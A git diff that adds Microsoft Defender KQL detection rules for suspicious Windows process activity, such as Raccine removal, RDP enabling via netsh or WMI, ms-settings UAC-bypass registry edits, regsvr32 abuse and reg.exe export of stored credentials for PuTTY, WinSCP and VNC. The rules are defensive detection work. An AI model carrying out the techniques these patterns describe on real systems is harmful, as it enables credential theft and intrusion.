diff --git a/KQL/rules/windows/process_creation/quickassist_execution.kql b/KQL/rules/windows/process_creation/quickassist_execution.kql
new file mode 100644
index 00000000..d775ccb6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/quickassist_execution.kql
@@ -0,0 +1,12 @@
+// Title: QuickAssist Execution
+// Author: Muhammad Faisal (@faisalusuf)
+// Date: 2024-12-19
+// Level: low
+// Description: Detects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use of Quick Assist in the environment.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\QuickAssist.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/raccine_uninstall.kql b/KQL/rules/windows/process_creation/raccine_uninstall.kql
new file mode 100644
index 00000000..5819e516
--- /dev/null
+++ b/KQL/rules/windows/process_creation/raccine_uninstall.kql
@@ -0,0 +1,12 @@
+// Title: Raccine Uninstall
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-21
+// Level: high
+// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate deinstallation by administrative staff
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql b/KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql
new file mode 100644
index 00000000..1a9de391
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rar_usage_with_password_and_compression_level.kql
@@ -0,0 +1,13 @@
+// Title: Rar Usage with Password and Compression Level
+// Author: @ROxPinTeddy
+// Date: 2020-05-12
+// Level: high
+// Description: Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001
+// False Positives:
+//   - Legitimate use of Winrar command line version
+//   - Other command line tools, that use these flags
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -hp" and (ProcessCommandLine contains " -m" or ProcessCommandLine contains " a ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql b/KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql
new file mode 100644
index 00000000..52f9dc57
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rdp_connection_allowed_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: RDP Connection Allowed Via Netsh.EXE
+// Author: Sander Wiebing
+// Date: 2020-05-23
+// Level: high
+// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+//   - Legitimate administration activity
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql b/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql
new file mode 100644
index 00000000..52185e31
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rdp_enable_or_disable_via_win32_terminalservicesetting_wmi_class.kql
@@ -0,0 +1,15 @@
+// Title: RDP Enable or Disable via Win32_TerminalServiceSetting WMI Class
+// Author: Daniel Koifman (KoifSec), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-15
+// Level: medium
+// Description: Detects enabling or disabling of Remote Desktop Protocol (RDP) using alternate methods such as WMIC or PowerShell.
+// In PowerShell one-liner commands, the "SetAllowTSConnections" method of the "Win32_TerminalServiceSetting" class may be used to enable or disable RDP.
+// In WMIC, the "rdtoggle" alias or "Win32_TerminalServiceSetting" class may be used for the same purpose.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.001, attack.execution, attack.t1047
+// False Positives:
+//   - Legitimate system administrators enabling RDP for remote support
+//   - System configuration scripts during deployment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "rdtoggle" or ProcessCommandLine contains "Win32_TerminalServiceSetting") and ProcessCommandLine contains "SetAllowTSConnections" and ((FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql
new file mode 100644
index 00000000..f4985f03
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rdp_port_forwarding_rule_added_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: RDP Port Forwarding Rule Added Via Netsh.EXE
+// Author: Florian Roth (Nextron Systems), oscd.community
+// Date: 2019-01-29
+// Level: high
+// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+//   - Legitimate administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql b/KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql
new file mode 100644
index 00000000..f0a44140
--- /dev/null
+++ b/KQL/rules/windows/process_creation/read_contents_from_stdin_via_cmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: Read Contents From Stdin Via Cmd.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-07
+// Level: medium
+// Description: Detect the use of "<" to read and potentially execute a file via cmd.exe
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "<" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql b/KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql
new file mode 100644
index 00000000..bfc0adbc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/rebuild_performance_counter_values_via_lodctr_exe.kql
@@ -0,0 +1,12 @@
+// Title: Rebuild Performance Counter Values Via Lodctr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-15
+// Level: medium
+// Description: Detects the execution of "lodctr.exe" to rebuild the performance counter registry values. This can be abused by attackers by providing a malicious config file to overwrite performance counter configuration to confuse and evade monitoring and security solutions.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate usage by an administrator
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -r" or ProcessCommandLine contains " /r" or ProcessCommandLine contains " –r" or ProcessCommandLine contains " —r" or ProcessCommandLine contains " ―r") and (FolderPath endswith "\\lodctr.exe" and ProcessVersionInfoOriginalFileName =~ "LODCTR.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql b/KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql
new file mode 100644
index 00000000..5ddcf479
--- /dev/null
+++ b/KQL/rules/windows/process_creation/recon_command_output_piped_to_findstr_exe.kql
@@ -0,0 +1,11 @@
+// Title: Recon Command Output Piped To Findstr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-07-06
+// Level: medium
+// Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" for example.
+// Attackers often time use this technique to extract specific information they require in their reconnaissance phase.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1057
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "ipconfig" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "net" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "netstat" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "ping" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "systeminfo" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "tasklist" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find") or (ProcessCommandLine contains "whoami" and ProcessCommandLine contains "|" and ProcessCommandLine contains "find")) and (not((ProcessCommandLine contains "cmd.exe /c TASKLIST /V |" and ProcessCommandLine contains "FIND /I" and ProcessCommandLine contains "\\xampp\\" and ProcessCommandLine contains "\\catalina_start.bat")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql b/KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql
new file mode 100644
index 00000000..632091d5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/recon_information_for_export_with_command_prompt.kql
@@ -0,0 +1,10 @@
+// Title: Recon Information for Export with Command Prompt
+// Author: frack113
+// Date: 2021-07-30
+// Level: medium
+// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1119
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\tree.com" or FolderPath endswith "\\WMIC.exe" or FolderPath endswith "\\doskey.exe" or FolderPath endswith "\\sc.exe") or (ProcessVersionInfoOriginalFileName in~ ("wmic.exe", "DOSKEY.EXE", "sc.exe"))) and (InitiatingProcessCommandLine contains " > %TEMP%\\" or InitiatingProcessCommandLine contains " > %TMP%\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql b/KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql
new file mode 100644
index 00000000..c7a12c29
--- /dev/null
+++ b/KQL/rules/windows/process_creation/reg_add_suspicious_paths.kql
@@ -0,0 +1,12 @@
+// Title: Reg Add Suspicious Paths
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: high
+// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562.001
+// False Positives:
+//   - Rare legitimate add to registry via cli (to these locations)
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql
new file mode 100644
index 00000000..63ca896d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/regasm_exe_execution_without_commandline_flags_or_files.kql
@@ -0,0 +1,13 @@
+// Title: RegAsm.EXE Execution Without CommandLine Flags or Files
+// Author: frack113
+// Date: 2025-06-04
+// Level: low
+// Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity.
+// Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+// False Positives:
+//   - Legitimate use of Regasm by developers.
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "RegAsm" or ProcessCommandLine endswith "RegAsm.exe" or ProcessCommandLine endswith "RegAsm.exe\"" or ProcessCommandLine endswith "RegAsm.exe'") and (FolderPath endswith "\\RegAsm.exe" or ProcessVersionInfoOriginalFileName =~ "RegAsm.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql b/KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql
new file mode 100644
index 00000000..1b2076fa
--- /dev/null
+++ b/KQL/rules/windows/process_creation/regedit_as_trusted_installer.kql
@@ -0,0 +1,12 @@
+// Title: Regedit as Trusted Installer
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-27
+// Level: high
+// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql b/KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql
new file mode 100644
index 00000000..d77ee3a0
--- /dev/null
+++ b/KQL/rules/windows/process_creation/register_app_vbs_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: REGISTER_APP.VBS Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql b/KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql
new file mode 100644
index 00000000..3d9c14fc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/registry_export_of_third_party_credentials.kql
@@ -0,0 +1,11 @@
+// Title: Registry Export of Third-Party Credentials
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-05-22
+// Level: high
+// Description: Detects the use of reg.exe to export registry paths associated with third-party credentials.
+// Credential stealers have been known to use this technique to extract sensitive information from the registry.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (ProcessCommandLine contains "save" or ProcessCommandLine contains "export") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql
new file mode 100644
index 00000000..6aed05d1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/registry_manipulation_via_wmi_stdregprov.kql
@@ -0,0 +1,14 @@
+// Title: Registry Manipulation via WMI Stdregprov
+// Author: Daniel Koifman (KoifSec)
+// Date: 2025-07-30
+// Level: medium
+// Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class.
+// This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe.
+// Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012
+// False Positives:
+//   - Legitimate administrative activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "stdregprov") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql b/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql
new file mode 100644
index 00000000..8e185f1f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/registry_modification_attempt_via_vbscript.kql
@@ -0,0 +1,12 @@
+// Title: Registry Modification Attempt Via VBScript
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-08-13
+// Level: medium
+// Description: Detects attempts to modify the registry using VBScript's CreateObject("Wscript.shell") and RegWrite methods via common LOLBINs.
+// It could be an attempt to modify the registry for persistence without using straightforward methods like regedit.exe, reg.exe, or PowerShell.
+// Threat Actors may use this technique to evade detection by security solutions that monitor for direct registry modifications through traditional tools.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112, attack.t1059.005
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "CreateObject" and ProcessCommandLine contains "Wscript.shell" and ProcessCommandLine contains ".RegWrite"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql b/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql
new file mode 100644
index 00000000..b4bd0d6c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/registry_modification_of_ms_settings_protocol_handler.kql
@@ -0,0 +1,11 @@
+// Title: Registry Modification of MS-settings Protocol Handler
+// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-12-20
+// Level: medium
+// Description: Detects registry modifications to the 'ms-settings' protocol handler, which is frequently targeted for UAC bypass or persistence.
+// Attackers can modify this registry to execute malicious code with elevated privileges by hijacking the command execution path.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1548.002, attack.t1546.001, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-ItemProperty" or ProcessCommandLine contains "Set-ItemProperty" or ProcessCommandLine contains "ni " or ProcessCommandLine contains "sp ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell.exe", "pwsh.dll"))))) and ProcessCommandLine contains "\\ms-settings\\shell\\open\\command"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql b/KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql
new file mode 100644
index 00000000..eaafc645
--- /dev/null
+++ b/KQL/rules/windows/process_creation/registry_modification_via_regini_exe.kql
@@ -0,0 +1,12 @@
+// Title: Registry Modification Via Regini.EXE
+// Author: Eli Salem, Sander Wiebing, oscd.community
+// Date: 2020-10-08
+// Level: low
+// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+//   - Legitimate modification of keys
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql
new file mode 100644
index 00000000..478e0a28
--- /dev/null
+++ b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_suspicious_file_extension.kql
@@ -0,0 +1,12 @@
+// Title: Regsvr32 DLL Execution With Suspicious File Extension
+// Author: Florian Roth (Nextron Systems), frack113
+// Date: 2021-11-29
+// Level: high
+// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql
new file mode 100644
index 00000000..f3ffff0c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/regsvr32_dll_execution_with_uncommon_extension.kql
@@ -0,0 +1,12 @@
+// Title: Regsvr32 DLL Execution With Uncommon Extension
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-07-17
+// Level: medium
+// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574, attack.execution
+// False Positives:
+//   - Other legitimate extensions currently not in the list either from third party or specific Windows components.
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql b/KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql
new file mode 100644
index 00000000..3225331f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/regsvr32_execution_from_highly_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Regsvr32 Execution From Highly Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: high
+// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql b/KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql
new file mode 100644
index 00000000..b16dd95f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/regsvr32_execution_from_potential_suspicious_location.kql
@@ -0,0 +1,12 @@
+// Title: Regsvr32 Execution From Potential Suspicious Location
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: medium
+// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+//   - Some installers might execute "regsvr32" with DLLs located in %TEMP% or in %PROGRAMDATA%. Apply additional filters if necessary.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql
new file mode 100644
index 00000000..d348e0b5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/remote_access_tool_anydesk_execution.kql
@@ -0,0 +1,14 @@
+// Title: Remote Access Tool - AnyDesk Execution
+// Author: frack113
+// Date: 2022-02-11
+// Level: medium
+// Description: An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
+// These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
+// Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002
+// False Positives:
+//   - Legitimate use
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\AnyDesk.exe" or FolderPath endswith "\\AnyDeskMSI.exe") or ProcessVersionInfoFileDescription =~ "AnyDesk" or ProcessVersionInfoProductName =~ "AnyDesk" or ProcessVersionInfoCompanyName =~ "AnyDesk Software GmbH"
\ No newline at end of file
